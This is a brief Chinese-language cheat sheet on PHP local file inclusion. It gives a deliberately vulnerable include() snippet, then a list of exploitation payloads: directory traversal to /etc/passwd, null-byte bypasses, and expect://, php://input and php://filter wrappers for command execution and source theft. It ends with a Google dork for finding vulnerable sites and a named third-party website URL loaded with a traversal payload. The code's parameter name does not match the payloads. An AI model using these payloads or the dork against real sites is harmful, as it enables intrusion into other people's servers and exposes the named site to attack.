代码实例:
<?php
$file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
?>
利用方式:
/script.php?page=../../../../../etc/passwd
php?page=expect://id
?page=/etc/passwd%00
?page=/etc/passwd%2500
warpper://target
?page=php://input&cmd=ls
page=php://filter/convert.base64-encode/resource=
google hacking
inurl:index.php?page=
vulnerable website:
http://confituredebali.com/index.php?page=../../../../../../../../etc/passwd